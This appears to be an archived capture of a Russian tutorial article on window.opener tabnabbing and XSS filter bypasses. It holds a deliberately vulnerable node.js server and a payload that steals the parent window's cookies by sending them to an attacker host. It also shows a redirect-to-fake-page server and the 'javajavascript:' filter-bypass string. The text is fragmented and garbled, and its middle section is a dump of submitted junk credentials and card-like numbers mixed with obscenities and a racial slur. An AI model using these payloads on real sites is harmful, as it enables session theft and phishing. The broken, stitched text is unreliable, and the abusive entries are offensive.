archive.is webpage capture | からアーカイブ | 2013年1月2日 22:32:21 UTC | |
すべてのスクリーンショット, | ドメインから habrahabr.ru | ||
からリンクされています | lurkmore.to » Огнелис | ||
ウェブページスクリーンショット | |||
short link long link html code wiki code |
//Код №1
/*Автор кода просит прощения за все баги, связанные с ним. Код написан под node.js */
var http = require('http');
http.createServer(function (rq, rs) {
var cookie="Super :"+Math.random(-1)*30/13+": Mario"; //при каждом новом запросе, значение куки будет разным
rs.writeHead(200, {'Content-Type': 'text/html',
'Set-Cookie': cookie});
if(!require('url').parse(rq.url).query){ // проверим на наличие входных данных
rs.end('<h2>ERROR!</h2><br>Example: http://127.0.0.1:8080/wo.bug?host=http://google.com/<br>Shutting down :)');
console.log('[DEBUG] URL: '+rq.url+' is not valid!'); // немножко дебага
console.log('Achtung!');
process.kill(process.pid); //чтобы наверняка :)
}
var host=require('url').parse(rq.url, true).query.host, //парсим
host=host.replace(/ /g,'%20'),//Решим проблему с обрезанием пробела
host=host.replace(/</g,'&'+'lt;'), //antiXSS
host=host.replace(/>/g,'&'+'gt;'), //antiXSS
host=host.replace(/javascript:/g,''); //antiXSS
console.log('URL: '+host); //Вывод ссылки в консоль
rs.end('<center><br><a href='+host+' target="_blank">click-click</a><br>Hey, '+cookie+'! </center>'); //"безопасный" вывод
}).listen(8080); //запустим сервер на 8080 порту
var snif=new Image(), //инициализируем картинку
ck=window.opener.document.cookie, //получаем куки из родительского окна
concat = function() { return Array.prototype.slice.call(arguments).join("")};//объединяем строки без использования знака +, так как знак плюс при GET запросе равносилен пробелу, что приведет к ошибочному синтаксису JavaScript
snif.src=concat('http://192.168.1.4:8081/?cok=',ck); //отсылаем куки (192.168.1.4-локальный IP виртуальной машины)
<script>Наш payload</script>
).Нажимаем на ссылку и любуемся куками:/*…*/
host=host.replace(/</g,'&'+'lt;'), //antiXSS
host=host.replace(/>/g,'&'+'gt;'), //antiXSS
host=host.replace(/javascript:/g,''), //antiXSS
host=host.replace(/data:/g,''); //Data не пройдет!
/*…*/
var http = require('http');
if(!process.argv[2] || !process.argv[3]){console.log('Usage: node '+process.argv[1]+' ip port');process.exit(1)}
http.createServer(function (rq, rs) {
rs.writeHead(200, {'Content-Type': 'text/html'}); //всем добра, всем 200
if(!rq.headers.referer){ // если Referer отсутствует
rs.end('');
console.log('Referer is undefined!');
process.exit(1);
}
var host=require('url').parse(rq.headers.referer).hostname; // Извлекаем домен из Referer'а
var out="<html><script>"+
"window.opener.location='http://"+process.argv[2]+":"+process.argv[3]+"/"+host+".html';"+ //переопределяем страницу на поддельную
"window.close()"+ //закрываем окно
"</script></html>";
rs.end(out); //осуществляем подмену
console.log('Window.opener changed!');
process.exit(1);
}).listen(80) // Запускаемся на 80 порту
<?php
$url=str_replace('data:','',$_GET['href']); //удалим "data:"
$url=htmlspecialchars(str_replace('javascript:','',$url)); //защитимся от XSS
if(!$url){die();};
echo "<html>";
echo "<body>";
echo "<script>";
echo "window.opener=null;"; //переопределяем w.o на null
echo "document.location='".$url."';"; //выполняем перенаправление
echo "</script>";
echo "</body>";
echo "</html>";
?>
/**/
rs.end('<center><br><a href="http://site.com/file.php?href='+host+'" target="_blank">click-click</a><br>Hey, '+cookie+'! </center>');
/**/
_blank
на _self
у нажимаемых ссылок. на 2х сайтах
alert(window.opener.document.cookie);
@?>@? ?@>@?>
000xren000 vam
0<?php exit; ?> 1
1 0
1 1
11 11
111 11
111 111
1111222233334444 5555
1 2
123 123
123123123 123123
123 213
123 321
123 423
123 45
12345 12345
123455642234577876656 cvv2
123456 1234
1234567890 1234567890
12345 cvv2
1234 fds
123 A<<2
123 cvv2
1254123612379542 1234
12 qw
1344177856736543 1254
146741467414674 343
1 cvv2
20AO ?C?:8=
2113 123123
2222333344449999 178
324091421234 423
3543535343 345345
4222054974838563 111
4322567800017945 987
433354354 5454
4345100006450834 254
4378489022124789 037
4688666655432348 354
4764 7524 3615 6542 456159753
5
554545141489421 3124
5 6
643563456 345634563456
848 =0 EC9
848 =0EC9
-96048136q436 cvv2
a a
aaza
admin admin
afiget' afiget'
}{akep root
alibaba lmfsdznrbuwah4yh2y47q2yu3wiotjioe
asd asd
asdasd asdasdasd
azsx sxdc
bfg gfbgfb
bsdsdf sfsdfdsf
c =>2K< 3>4><!
ccc cccc
credit card number cvv2
йй йй
D::D
допе cvv2
автор соси хуй сочно блять соси!!!!!!!!
ddg dgdags
парпа апрапр
demo demo
dfegrg 456
dffasf aff
dfg dgf
dfsdf sdfdsf
dfvdfvfdv sdv sds
die bitch
E@5= B515
E BK 6>?0 A @CG >9, 409 8=209B:im-sadya.ru
>EC5BL! 09B5 420!
EC9?87404683C@40 >;>;>
EC9 A>A=CBL =5 E>G5HL? password
EC9 B515
errereerer erererreer
fhvd vjvf
fil9 30294327492743219234
fuck fuck
fuck off
fuck off nigger fuck off nigger
fuck _u
fuck you
Fuck You
fuck you lold:0
gkh ghk
good joke:)
HAPPY NEW YEAR
hehehe 123
hello LOL
h h
hhh y7
holy shit
huipisda hui
hyi hyi
idi nahui
idite naxyi
Intruder! fADEAWAY
kkk oooo
lol 123
lol i like habk
lol lol
lolsda ahahah nice joke
Lt.RAT Elmekia111
Nicola Tesla tunguska
ñîñè øêîëüèíê
no card :(
nu da? pohui
number cvv2
okidinahui pidaras
oldtricks arealwaysnice!
>;>;> olololo
Poshel Na_Hui
privet habr
q11 q11
qqqqq qqq11
qwe 123
qwe qwe
re fxc
rr ee
sdf asd
sd sd
shkoJIbHer atake
SOSAI PLS
sosi_hui_admin FUCK_FUCK_TWICE
srv rfrekz
Suck cock
suck_yourself xa-xa-xa
test
tst test
vakhmurka Qw766346zx
VASIAPUPKIN HUYEVVAMVNOVIYGOD
VasilyiAlibabaevich Pupkin
very good
w d
werfwte awert4h65u6
WTF Well done
x172772 netort99
xyu cocqtb>
href
, то можно без проблем сделать, например, так:<a href="javascript:alert('Hello, world!')">Link</a>
javascript`ом
в ссылке:host=host.replace(/javascript:/g,''); //antiXSS
<a href="javajavascript:script:alert('Hello, world!');"></a>
"
javajavascript:script:alert('Hello, world!');"
, останется только
"javascript:alert('Hello, world!');